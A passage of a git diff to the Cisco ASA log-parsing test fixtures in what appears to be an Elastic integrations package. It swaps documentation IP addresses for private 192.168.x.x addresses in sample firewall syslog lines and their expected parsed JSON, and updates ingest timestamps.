DNS Query -Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 : %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic -Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside -Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username) +Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside +Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username) diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json index 7a2fdcad80c..686cc9c87b3 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672304618Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:32:11.534937100Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672398079Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:32:11.534941700Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, @@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672402326Z", - "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.534947900Z", + "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672404806Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:32:11.534954500Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { @@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672406643Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:32:11.534960200Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672408379Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:32:11.534965800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" @@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672410128Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:32:11.534971700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672411932Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:32:11.534977400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672413702Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:32:11.534983100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672415481Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:32:11.534988700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" @@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672417225Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:32:11.534994300Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-07-19T09:06:19.672419500Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:32:11.535000400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-07-19T09:06:19.672421418Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:32:11.535006100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672423189Z", + "ingested": "2021-12-09T13:32:11.535011800Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672424900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:32:11.535017400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" @@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672426609Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:32:11.535021700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 